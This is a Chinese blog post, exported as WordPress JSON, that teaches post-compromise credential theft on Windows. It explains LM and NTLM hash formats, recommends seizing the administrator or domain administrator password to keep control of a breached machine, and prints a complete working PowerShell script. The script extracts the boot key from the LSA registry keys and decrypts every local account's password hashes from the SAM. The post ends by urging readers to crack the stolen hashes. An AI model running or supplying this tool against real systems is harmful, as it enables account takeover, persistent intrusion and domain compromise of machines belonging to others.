{"id":33536,"date":"2014-10-08T10:28:57","date_gmt":"2014-10-08T09:28:57","guid":{"rendered":"http:\/\/www.fuhaijun.com\/?p=33536"},"modified":"2024-11-06T11:18:46","modified_gmt":"2024-11-06T03:18:46","slug":"%e9%80%9a%e8%bf%87powershell%e8%8e%b7%e5%8f%96windows%e7%b3%bb%e7%bb%9f%e5%af%86%e7%a0%81hash","status":"publish","type":"post","link":"http:\/\/www.fuhaijun.com\/?p=33536","title":{"rendered":"\u901a\u8fc7PowerShell\u83b7\u53d6Windows\u7cfb\u7edf\u5bc6\u7801Hash"},"content":{"rendered":"

\u5f53\u4f60\u62ff\u5230\u4e86\u7cfb\u7edf\u63a7\u5236\u6743\u4e4b\u540e\u5982\u4f55\u624d\u80fd\u66f4\u957f\u7684\u65f6\u95f4\u5185\u63a7\u5236\u5df2\u7ecf\u62ff\u5230\u8fd9\u53f0\u673a\u5668\u5462\uff1f\u4f5c\u4e3a\u767d\u5e3d\u5b50\uff0c\u5df2\u7ecf\u5728\u5bf9\u624b\u9632\u7ebf\u4e0a\u6495\u5f00\u4e00\u4e2a\u53e3\u5b50\uff0c\u5982\u679c\u4f60\u9700\u8981\u8fdb\u4e00\u6b65\u6269\u5927\u6218\u679c\uff0c\u4f60\u9996\u5148\u9700\u8981\u505a\u7684\u5c31\u662f\u6f5c\u4f0f\u4e0b\u6765\uff0c\u6536\u96c6\u66f4\u591a\u7684\u4fe1\u606f\u4fbf\u4e8e\u4f60\u5224\u65ad\uff0c\u4fbf\u4e8e\u6709\u66f4\u5927\u7684\u6536\u83b7\u3002\u7528\u4ec0\u4e48\u65b9\u6cd5\u624d\u80fd\u6709\u5c3d\u53ef\u80fd\u9ad8\u7684\u6743\u9650\uff0c\u540c\u65f6\u80fd\u66f4\u6709\u6548\u7684\u9690\u85cf\u81ea\u5df1\uff0c\u662f\u7559webshell\uff0c\u7559\u540e\u95e8\uff0c\u79cd\u6728\u9a6c\u8fd8\u662fRootkit\uff1fwebshell\uff0c\u54ea\u6015\u662f\u4e00\u53e5\u8bdd\u6728\u9a6c\u90fd\u5f88\u5bb9\u6613\u88ab\u7ba1\u7406\u5458\u6e05\u9664\uff0c\u653e\u4e86\u6728\u9a6c\uff0c\u4e5f\u5bb9\u6613\u88ab\u6709\u7ecf\u9a8c\u7684\u7ba1\u7406\u5458\u67e5\u51fa\uff0c\u4e0d\u7ba1\u662f\u65e9\u671f\u81ea\u5df1\u521b\u5efa\u8fdb\u7a0b\uff0c\u8fdb\u7a0b\u88ab\u5e72\u6389\u5c31\u5b8c\u4e86\uff0c\u8fd8\u662f\u6ce8\u5165\u8fdb\u7a0b\u7684\u6728\u9a6c\uff0c\u6216\u8005\u662f\u4ee5\u670d\u52a1\u81ea\u542f\u52a8\u7684\u6728\u9a6c\uff0c\u54ea\u6015\u662f\u66ff\u6362\u6b21\u8981\u7684\u7cfb\u7edf\u670d\u52a1\u81ea\u5df1\u542f\u52a8\u7684\u6728\u9a6c\uff0c\u9690\u853d\u6027\u90fd\u592a\u5dee\u4e86\u3002\u4e0d\u7ba1\u540e\u95e8\u7559\u7684\u5982\u4f55\u5b8c\u7f8e\uff0c\u6728\u9a6c\u514d\u6740\u505a\u7684\u591a\u597d\uff0c\u6700\u7ec8\u8fd8\u662f\u505a\u4e0d\u5230\u4e0d\u7559\u4efb\u4f55\u75d5\u8ff9\u3002<\/p>\n

\u90a3\u4ec0\u4e48\u65b9\u6cd5\u624d\u80fd\u8fbe\u5230\u76ee\u7684\uff0c\u53c8\u4e0d\u5bb9\u6613\u88ab\u53d1\u73b0\u5462\uff1f\u4ee5\u7ba1\u7406\u5458\u7684\u8eab\u4efd\u6765\u7ba1\u7406\u670d\u52a1\u5668\u4e0d\u5c31\u884c\u4e86\u4e48\uff1f\u4e0d\u7ba1\u7ba1\u7406\u5458\u662f\u75283389\u3001pcanywhere\u3001\u8fd8\u662fradmin\u7ba1\u7406\u670d\u52a1\u5668\uff0c\u83b7\u53d6\u4ed6\u7684\u5bc6\u7801\uff0c\u4ee5\u4ed6\u7684\u8eab\u4efd\u8fdb\u5165\u7cfb\u7edf\u4e0d\u5c31\u5f97\u4e86\uff0c\u5982\u679c\u662f\u57df\u7ba1\u7406\u5458\u5bc6\u7801\uff0c\u6574\u4e2a\u57df\u90fd\u4f1a\u5728\u4f60\u7684\u63a7\u5236\u4e4b\u4e0b\u4e86\u3002\u83b7\u53d6\u5bc6\u7801\u7684\u65b9\u6cd5\u9664\u4e86\u7f51\u7edc\u55c5\u63a2\uff0c\u8fd8\u53ef\u4ee5\u83b7\u53d6\u5bc6\u7801Hash\u540e\u901a\u8fc7\u5f69\u8679\u8868\u8fdb\u884c\u653b\u51fb\uff0c\u672c\u6587\u5c06\u4f1a\u4ecb\u7ecd\u901a\u8fc7PowerShell\u83b7\u53d6Windows\u7cfb\u7edf\u5bc6\u7801Hash\u7684\u65b9\u6cd5\uff0c\u6709\u4f55\u5bc6\u7801Hash\u5c31\u79bb\u62ff\u5230\u5bc6\u7801\u4e0d\u8fdc\u4e86\u3002<\/p>\n

\u9996\u5148\u4ecb\u7ecd\u4e00\u4e0bwindows\u5bc6\u7801Hash\uff1a<\/p>\n

\u65e9\u671fSMB\u534f\u8bae\u5728\u7f51\u7edc\u4e0a\u4f20\u8f93\u660e\u6587\u53e3\u4ee4\u3002\u540e\u6765\u51fa\u73b0"LAN Manager Challenge\/Response"\u9a8c\u8bc1\u673a\u5236\uff0c\u7b80\u79f0LM\uff0c\u5b83\u662f\u5982\u6b64\u7b80\u5355\u4ee5\u81f3\u5f88\u5bb9\u6613\u88ab\u7834\u89e3\u3002\u5fae\u8f6f\u63d0\u51fa\u4e86WindowsNT\u6311\u6218\/\u54cd\u5e94\u9a8c\u8bc1\u673a\u5236\uff0c\u79f0\u4e4b\u4e3aNTLM\u3002\u73b0\u5728\u5df2\u7ecf\u6709\u4e86\u66f4\u65b0\u7684NTLMv2\u4ee5\u53caKerberos\u9a8c\u8bc1\u4f53\u7cfb\u3002Windows\u52a0\u5bc6\u8fc7\u7684\u5bc6\u7801\u53e3\u4ee4\uff0c\u6211\u4eec\u79f0\u4e4b\u4e3ahash\uff08\u4e2d\u6587\uff1a\u54c8\u5e0c\uff09\uff0cWindows\u7684\u7cfb\u7edf\u5bc6\u7801hash\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u4e00\u822c\u7531\u4e24\u90e8\u5206\u7ec4\u6210\uff1a\u7b2c\u4e00\u90e8\u5206\u662fLM-hash\uff0c\u7b2c\u4e8c\u90e8\u5206\u662fNTLM-hash\u3002<\/p>\n

NTLM-Hash\u4e0eLM-Hash\u7b97\u6cd5\u76f8\u6bd4\uff0c\u660e\u6587\u53e3\u4ee4\u5927\u5c0f\u5199\u654f\u611f\uff0c\u4f46\u65e0\u6cd5\u6839\u636eNTLM-Hash\u5224\u65ad\u539f\u59cb\u660e\u6587\u53e3\u4ee4\u662f\u5426\u5c0f\u4e8e8\u5b57\u8282\uff0c\u6446\u8131\u4e86\u9b54\u672f\u5b57\u7b26\u4e32"KGS!@#$%"\u3002MD4\u662f\u771f\u6b63\u7684\u5355\u5411\u54c8\u5e0c\u51fd\u6570\uff0c\u7a77\u4e3e\u505a\u4e3a\u6570\u636e\u6e90\u51fa\u73b0\u7684\u660e\u6587\uff0c\u96be\u5ea6\u8f83\u5927\u3002\u95ee\u9898\u5728\u4e8e\uff0c\u5fae\u8f6f\u4e00\u5473\u5f3a\u8c03NTLM-Hash\u7684\u5f3a\u5ea6\u9ad8\uff0c\u5374\u907f\u800c\u4e0d\u8c08\u4e00\u4e2a\u4e8b\u5b9e\uff0c\u4e3a\u4e86\u4fdd\u6301\u5411\u540e\u517c\u5bb9\u6027\uff0cNTLM-Hash\u7f3a\u7701\u603b\u662f\u4e0eLM-Hash\u4e00\u8d77\u4f7f\u7528\u7684\u3002\u8fd9\u610f\u5473\u7740NTLM-Hash\u5f3a\u8c03\u518d\u9ad8\u4e5f\u662f\u65e0\u52a9\u4e8e\u5b89\u5168\u7684\uff0c\u76f8\u53cd\u6f5c\u5728\u635f\u5bb3\u7740\u5b89\u5168\u6027\u3002\u589e\u52a0NTLM-Hash\u540e\uff0c\u9996\u5148\u5229\u7528LM-Hash\u7684\u5f31\u70b9\u7a77\u4e3e\u51fa\u539f\u59cb\u660e\u6587\u53e3\u4ee4\u7684\u5927\u5c0f\u5199\u4e0d\u654f\u611f\u7248\u672c\uff0c\u518d\u5229\u7528NTLM-Hash\u4fee\u6b63\u51fa\u539f\u59cb\u660e\u6587\u53e3\u4ee4\u7684\u5927\u5c0f\u5199\u654f\u611f\u7248\u672c\u3002<\/p>\n

Windows\u7cfb\u7edf\u4e0b\u7684hash\u5bc6\u7801\u683c\u5f0f\u4e3a\uff1a\u7528\u6237\u540d\u79f0:RID:LM-HASH\u503c:NT-HASH\u503c\uff0c\u4f8b\u5982\uff1a<\/p>\n

Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::\u8868\u793a<\/p>\n

\u7528\u6237\u540d\u79f0\u4e3a\uff1aAdministrator<\/p>\n

RID\u4e3a\uff1a500<\/p>\n

LM-HASH\u503c\u4e3a\uff1aC8825DB10F2590EAAAD3B435B51404EE<\/p>\n

NT-HASH\u503c\u4e3a\uff1a683020925C5D8569C23AA724774CE6CC<\/p>\n

\u5982\u679c\u4f60\u77e5\u9053\u8fd9\u4e2a\u7528\u6237\u7684hash\u5bc6\u7801\u4e86\uff0c\u62ff\u7740C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC\u53bbhash\u5728\u7ebf\u67e5\u8be2\u7f51\u7ad9<\/p>\n

http:\/\/www.objectif-securite.ch\/en\/ophcrack.php<\/a>\u67e5\u4e00\u4e0b\u5f88\u5bb9\u6613\u5c31\u80fd\u5f97\u5230\u5bc6\u7801\u3002<\/p>\n

\u4e0b\u9762\u76f4\u63a5\u4e0a\u4ee3\u7801\uff0c\u7136\u540e\u5bf9\u4ee3\u7801\u7b80\u5355\u505a\u4e00\u4e2a\u89e3\u91ca\uff0c\u6700\u540e\u6f14\u793a\u4e00\u4e0b\u6267\u884c\u6548\u679c\u3002<\/p>\n

function<\/font> Get-WinPassHashes\n{\n<# Author:fuhj(powershell#live.cn ,http:\/\/fuhaijun.com)  <\/font>\n    # Get windows password hash and returns the hash list<\/font>\n    #.Example<\/font>\n    #   Get-WinPassHashes<\/font>\n    #<\/font>\n    #><\/font>\n\n    [CmdletBinding()]\n    Param<\/font> ()\nfunction<\/font> LoadApi\n{\n    $oldErrorAction = $global:ErrorActionPreference;\n    $global:ErrorActionPreference = "SilentlyContinue"<\/font>;\n    $test = [PowerDump.Native];\n    $global:ErrorActionPreference = $oldErrorAction;\n    if<\/font> ($test)\n    {\n        # already loaded<\/font>\n        return<\/font>;\n     }\n\n$code = @'<\/font>\nusing System;\nusing System.Security.Cryptography;\nusing System.Runtime.InteropServices;\nusing System.Text;\n\nnamespace PowerDump\n{\n    public class Native\n    {\n    [DllImport("advapi32.dll"<\/font>, CharSet = CharSet.Auto)]\n     public static extern int<\/font> RegOpenKeyEx(\n        int<\/font> hKey,\n        string<\/font> subKey,\n        int<\/font> ulOptions,\n        int<\/font> samDesired,\n        out int<\/font> hkResult);\n\n    [DllImport("advapi32.dll"<\/font>, EntryPoint = "RegEnumKeyEx"<\/font>)]\n    extern public static int<\/font> RegEnumKeyEx(\n        int<\/font> hkey,\n        int<\/font> index,\n        StringBuilder lpName,\n        ref int<\/font> lpcbName,\n        int<\/font> reserved,\n        StringBuilder lpClass,\n        ref int<\/font> lpcbClass,\n        out long lpftLastWriteTime);\n\n    [DllImport("advapi32.dll"<\/font>, EntryPoint="RegQueryInfoKey"<\/font>, CallingConvention=CallingConvention.Winapi, SetLastError=true)]\n    extern public static int<\/font> RegQueryInfoKey(\n        int<\/font> hkey,\n        StringBuilder lpClass,\n        ref int<\/font> lpcbClass,\n        int<\/font> lpReserved,\n        out int<\/font> lpcSubKeys,\n        out int<\/font> lpcbMaxSubKeyLen,\n        out int<\/font> lpcbMaxClassLen,\n        out int<\/font> lpcValues,\n        out int<\/font> lpcbMaxValueNameLen,\n        out int<\/font> lpcbMaxValueLen,\n        out int<\/font> lpcbSecurityDescriptor,\n        IntPtr lpftLastWriteTime);\n\n    [DllImport("advapi32.dll"<\/font>, SetLastError=true)]\n    public static extern int<\/font> RegCloseKey(\n        int<\/font> hKey);\n\n        }\n    } \/\/ end<\/font> namespace PowerDump\n\n    public class Shift {\n        public static int<\/font>   Right(int<\/font> x,   int<\/font> count) { return<\/font> x >> count; }\n        public static uint  Right(uint x,  int<\/font> count) { return<\/font> x >> count; }\n        public static long  Right(long x,  int<\/font> count) { return<\/font> x >> count; }\n        public static ulong Right(ulong x, int<\/font> count) { return<\/font> x >> count; }\n        public static int<\/font>    Left(int<\/font> x,   int<\/font> count) { return<\/font> x << count; }\n        public static uint   Left(uint x,  int<\/font> count) { return<\/font> x << count; }\n        public static long   Left(long x,  int<\/font> count) { return<\/font> x << count; }\n        public static ulong  Left(ulong x, int<\/font> count) { return<\/font> x << count; }\n    }\n'@\n\n   $provider = New-Object<\/font> Microsoft.CSharp.CSharpCodeProvider\n   $dllName = [PsObject].Assembly.Location\n   $compilerParameters = New-Object<\/font> System.CodeDom.Compiler.CompilerParameters\n   $assemblies = @("System.dll"<\/font>, $dllName)\n   $compilerParameters.ReferencedAssemblies.AddRange($assemblies)\n   $compilerParameters.GenerateInMemory = $true\n   $compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code)\n   if<\/font>($compilerResults.Errors.Count -gt<\/font> 0) {\n     $compilerResults.Errors | %<\/font> { Write-Error<\/font> ("{0}:`t{1}"<\/font> -f<\/font> $_.Line,$_.ErrorText) }\n   }\n\n}\n\n$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0"<\/font>);\n$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0"<\/font>);\n$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);\n$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);\n$odd_parity = @(\n  1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,\n  16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,\n  32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,\n  49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,\n  64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,\n  81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,\n  97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,\n  112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,\n  128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,\n  145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,\n  161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,\n  176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,\n  193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,\n  208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,\n  224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,\n  241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254\n);\n\nfunction<\/font> sid_to_key($sid)\n{\n    $s1 = @();\n    $s1 += [char]($sid -band<\/font> 0xFF);\n    $s1 += [char]([Shift]::Right($sid,8) -band<\/font> 0xFF);\n    $s1 += [char]([Shift]::Right($sid,16) -band<\/font> 0xFF);\n    $s1 += [char]([Shift]::Right($sid,24) -band<\/font> 0xFF);\n    $s1 += $s1[0];\n    $s1 += $s1[1];\n    $s1 += $s1[2];\n    $s2 = @();\n    $s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2];\n    $s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2];\n    return<\/font> ,((str_to_key $s1),(str_to_key $s2));\n}\n\nfunction<\/font> str_to_key($s)\n{\n    $key = @();\n    $key += [Shift]::Right([int<\/font>]($s[0]), 1 );\n    $key += [Shift]::Left( $([int<\/font>]($s[0]) -band<\/font> 0x01), 6) -bor<\/font> [Shift]::Right([int<\/font>]($s[1]),2);\n    $key += [Shift]::Left( $([int<\/font>]($s[1]) -band<\/font> 0x03), 5) -bor<\/font> [Shift]::Right([int<\/font>]($s[2]),3);\n    $key += [Shift]::Left( $([int<\/font>]($s[2]) -band<\/font> 0x07), 4) -bor<\/font> [Shift]::Right([int<\/font>]($s[3]),4);\n    $key += [Shift]::Left( $([int<\/font>]($s[3]) -band<\/font> 0x0F), 3) -bor<\/font> [Shift]::Right([int<\/font>]($s[4]),5);\n    $key += [Shift]::Left( $([int<\/font>]($s[4]) -band<\/font> 0x1F), 2) -bor<\/font> [Shift]::Right([int<\/font>]($s[5]),6);\n    $key += [Shift]::Left( $([int<\/font>]($s[5]) -band<\/font> 0x3F), 1) -bor<\/font> [Shift]::Right([int<\/font>]($s[6]),7);\n    $key += $([int<\/font>]($s[6]) -band<\/font> 0x7F);\n    0..7 | %{\n        $key[$_] = [Shift]::Left($key[$_], 1);\n        $key[$_] = $odd_parity[$key[$_]];\n        }\n    return<\/font> ,$key;\n}\n\nfunction<\/font> NewRC4([byte[]]$key)\n{\n    return<\/font> new-object<\/font> Object |\n    Add-Member<\/font> NoteProperty key $key -PassThru |\n    Add-Member<\/font> NoteProperty S $null -PassThru |\n    Add-Member<\/font> ScriptMethod init {\n        if<\/font> (-not<\/font> $this.S)\n        {\n            [byte[]]$this.S = 0..255;\n            0..255 | %<\/font> -begin{[long]$j=0;}{\n                $j = ($j + $this.key[$($_ %<\/font> $this.key.Length)] + $this.S[$_]) %<\/font> $this.S.Length;\n                $temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;\n                }\n        }\n    } -PassThru |\n    Add-Member<\/font> ScriptMethod "encrypt"<\/font> {\n        $data = $args[0];\n        $this.init();\n        $outbuf = new-object<\/font> byte[] $($data.Length);\n        $S2 = $this.S[0..$this.S.Length];\n        0..$($data.Length-1) | %<\/font> -begin{$i=0;$j=0;} {\n            $i = ($i+1) %<\/font> $S2.Length;\n            $j = ($j + $S2[$i]) %<\/font> $S2.Length;\n            $temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;\n            $a = $data[$_];\n            $b = $S2[ $($S2[$i]+$S2[$j]) %<\/font> $S2.Length ];\n            $outbuf[$_] = ($a -bxor $b);\n        }\n        return<\/font> ,$outbuf;\n    } -PassThru\n}\n\nfunction<\/font> des_encrypt([byte[]]$data, [byte[]]$key)\n{\n    return<\/font> ,(des_transform $data $key $true)\n}\n\nfunction<\/font> des_decrypt([byte[]]$data, [byte[]]$key)\n{\n    return<\/font> ,(des_transform $data $key $false)\n}\n\nfunction<\/font> des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)\n{\n    $des = new-object<\/font> Security.Cryptography.DESCryptoServiceProvider;\n    $des.Mode = [Security.Cryptography.CipherMode]::ECB;\n    $des.Padding = [Security.Cryptography.PaddingMode]::None;\n    $des.Key = $key;\n    $des.IV = $key;\n    $transform = $null;\n    if<\/font> ($doEncrypt) {$transform = $des.CreateEncryptor();}\n    else<\/font>{$transform = $des.CreateDecryptor();}\n    $result = $transform.TransformFinalBlock($data, 0, $data.Length);\n    return<\/font> ,$result;\n}\n\nfunction<\/font> Get-RegKeyClass([string<\/font>]$key, [string<\/font>]$subkey)\n{\n    switch<\/font> ($Key) {\n        "HKCR"<\/font> { $nKey = 0x80000000} #HK Classes Root<\/font>\n        "HKCU"<\/font> { $nKey = 0x80000001} #HK Current User<\/font>\n        "HKLM"<\/font> { $nKey = 0x80000002} #HK Local Machine<\/font>\n        "HKU"<\/font>  { $nKey = 0x80000003} #HK Users<\/font>\n        "HKCC"<\/font> { $nKey = 0x80000005} #HK Current Config<\/font>\n        default<\/font> {\n            throw<\/font> "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"<\/font>\n        }\n    }\n    $KEYQUERYVALUE = 0x1;\n    $KEYREAD = 0x19;\n    $KEYALLACCESS = 0x3F;\n    $result = ""<\/font>;\n    [int<\/font>]$hkey=0\n    if<\/font> (-not<\/font> [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))\n    {\n        $classVal = New-Object<\/font> Text.Stringbuilder 1024\n        [int<\/font>]$len = 1024\n        if<\/font> (-not<\/font> [PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,\n            [ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))\n        {\n            $result = $classVal.ToString()\n        }\n        else<\/font>\n        {\n            Write-Error<\/font> "RegQueryInfoKey failed"<\/font>;\n        }\n        [PowerDump.Native]::RegCloseKey($hkey) | Out-Null<\/font>\n    }\n    else<\/font>\n    {\n        Write-Error<\/font> "Cannot open key"<\/font>;\n    }\n    return<\/font> $result;\n}\n\nfunction<\/font> Get-BootKey\n{\n    $s = [string<\/font>]::Join(""<\/font>,$("JD"<\/font>,"Skew1"<\/font>,"GBG"<\/font>,"Data"<\/font> | %{Get-RegKeyClass "HKLM"<\/font> "SYSTEM\\CurrentControlSet\\Control\\Lsa\\$_"<\/font>}));\n    $b = new-object<\/font> byte[] $($s.Length\/2);\n    0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}\n    $b2 = new-object<\/font> byte[] 16;\n    0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | %<\/font> -begin{$i=0;}{$b2[$i]=$b[$_];$i++}\n    return<\/font> ,$b2;\n}\n\nfunction<\/font> Get-HBootKey\n{\n    param<\/font>([byte[]]$bootkey);\n    $aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0<\/font>");\n    $anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0"<\/font>);\n    $k = Get-Item<\/font> HKLM:\\SAM\\SAM\\Domains\\Account;\n    if<\/font> (-not<\/font> $k) {return<\/font> $null}\n    [byte[]]$F = $k.GetValue("F"<\/font>);\n    if<\/font> (-not<\/font> $F) {return<\/font> $null}\n    $rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);\n    $rc4 = NewRC4 $rc4key;\n    return<\/font> ,($rc4.encrypt($F[0x80..0x9F]));\n}\n\nfunction<\/font> Get-UserName([byte[]]$V)\n{\n    if<\/font> (-not<\/font> $V) {return<\/font> $null};\n    $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;\n    $len = [BitConverter]::ToInt32($V[0x10..0x13],0);\n    return<\/font> [Text.Encoding]::Unicode.GetString($V, $offset, $len);\n}\n\nfunction<\/font> Get-UserHashes($u, [byte[]]$hbootkey)\n{\n    [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;\n    if<\/font> ($u.HashOffset + 0x28 -lt<\/font> $u.V.Length)\n    {\n        $lm_hash_offset = $u.HashOffset + 4;\n        $nt_hash_offset = $u.HashOffset + 8 + 0x10;\n        $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];\n        $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];\n    }\n    elseif<\/font> ($u.HashOffset + 0x14 -lt<\/font> $u.V.Length)\n    {\n        $nt_hash_offset = $u.HashOffset + 8;\n        $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];\n    }\n    return<\/font> ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);\n}\n\nfunction<\/font> DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)\n{\n    [byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;\n    # LM Hash<\/font>\n    if<\/font> ($enc_lm_hash)\n    {\n        $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;\n    }\n\n    # NT Hash<\/font>\n    if<\/font> ($enc_nt_hash)\n    {\n        $nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;\n    }\n\n    return<\/font> ,($lmhash,$nthash)\n}\n\nfunction<\/font> DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)\n{\n    $deskeys = sid_to_key $rid;\n    $md5 = [Security.Cryptography.MD5]::Create();\n    $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);\n    $rc4 = NewRC4 $rc4_key;\n    $obfkey = $rc4.encrypt($enc_hash);\n    $hash = (des_decrypt  $obfkey[0..7] $deskeys[0]) +\n        (des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);\n    return<\/font> ,$hash;\n}\n\nfunction<\/font> Get-UserKeys\n{\n    ls<\/font> HKLM:\\SAM\\SAM\\Domains\\Account\\Users |\n        where<\/font> {$_.PSChildName -match<\/font> "^[0-9A-Fa-f]{8}$"<\/font>} |\n            Add-Member<\/font> AliasProperty KeyName PSChildName -PassThru |\n            Add-Member<\/font> ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |\n            Add-Member<\/font> ScriptProperty V {[byte[]]($this.GetValue("V"<\/font>))} -PassThru |\n            Add-Member<\/font> ScriptProperty UserName {Get-UserName($this.GetValue("V"<\/font>))} -PassThru |\n            Add-Member<\/font> ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V"<\/font>)[0x9c..0x9f],0) + 0xCC} -PassThru\n}\n\nfunction<\/font> DumpHashes\n{\n    LoadApi\n    $bootkey = Get-BootKey;\n    $hbootKey = Get-HBootKey $bootkey;\n    Get-UserKeys | %{\n        $hashes = Get-UserHashes $_ $hBootKey;\n        "{0}:{1}:{2}:{3}:::"<\/font> -f<\/font> ($_.UserName,$_.Rid,\n            [BitConverter]::ToString($hashes[0]).Replace("-"<\/font>,""<\/font>).ToLower(),\n            [BitConverter]::ToString($hashes[1]).Replace("-"<\/font>,""<\/font>).ToLower());\n    }\n}\nDumpHashes\n}<\/pre>\n
\u4ee3\u7801\u4e2d\u5b9a\u4e49\u7684\u51fd\u6570Get-WinPassHashes\u4e2d\u5b9a\u4e49\u4e86\u591a\u4e2a\u51fd\u6570\uff0c\u5728\u51fd\u6570\u7684\u6700\u540e\u8c03\u7528DumpHashes\u4f5c\u4e3a\u5165\u53e3\u51fd\u6570\u3002<\/p>\n
\u8fd0\u884c\u6548\u679c\u5982\u4e0b\u6240\u793a<\/p>\n
\"image\" <\/p>\n
\u62ff\u7740hash\u901f\u901f\u7834\u89e3\u5bc6\u7801\u53bb\u5427^_^<\/p>\n
 <\/p>\n
\u4f5c\u8005: \u4ed8\u6d77\u519b
\n  
\u7248\u6743\uff1a\u672c\u6587\u7248\u6743\u5f52\u4f5c\u8005\u6240\u6709<\/p>\n
\u8f6c\u8f7d\uff1a\u6b22\u8fce\u8f6c\u8f7d\uff0c\u4e3a\u4e86\u4fdd\u5b58\u4f5c\u8005\u7684\u521b\u4f5c\u70ed\u60c5\uff0c\u8bf7\u6309\u8981\u6c42\u3010\u8f6c\u8f7d\u3011\uff0c\u8c22\u8c22<\/p>\n
\u8981\u6c42\uff1a\u672a\u7ecf\u4f5c\u8005\u540c\u610f\uff0c\u5fc5\u987b\u4fdd\u7559\u6b64\u6bb5\u58f0\u660e\uff1b\u5fc5\u987b\u5728\u6587\u7ae0\u4e2d\u7ed9\u51fa\u539f\u6587\u8fde\u63a5\uff1b\u5426\u5219\u5fc5\u7a76\u6cd5\u5f8b\u8d23\u4efb <\/p>\n
\u4e2a\u4eba\u7f51\u7ad9: http:\/\/www.fuhaijun.com\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
\u5f53\u4f60\u62ff\u5230\u4e86\u7cfb\u7edf\u63a7\u5236\u6743\u4e4b\u540e\u5982\u4f55\u624d\u80fd\u66f4\u957f\u7684\u65f6\u95f4\u5185\u63a7\u5236\u5df2\u7ecf\u62ff\u5230\u8fd9\u53f0\u673a\u5668\u5462\uff1f\u4f5c\u4e3a\u767d\u5e3d\u5b50\uff0c\u5df2\u7ecf\u5728\u5bf9\u624b\u9632\u7ebf\u4e0a\u6495\u5f00\u4e00\u4e2a\u53e3\u5b50\uff0c 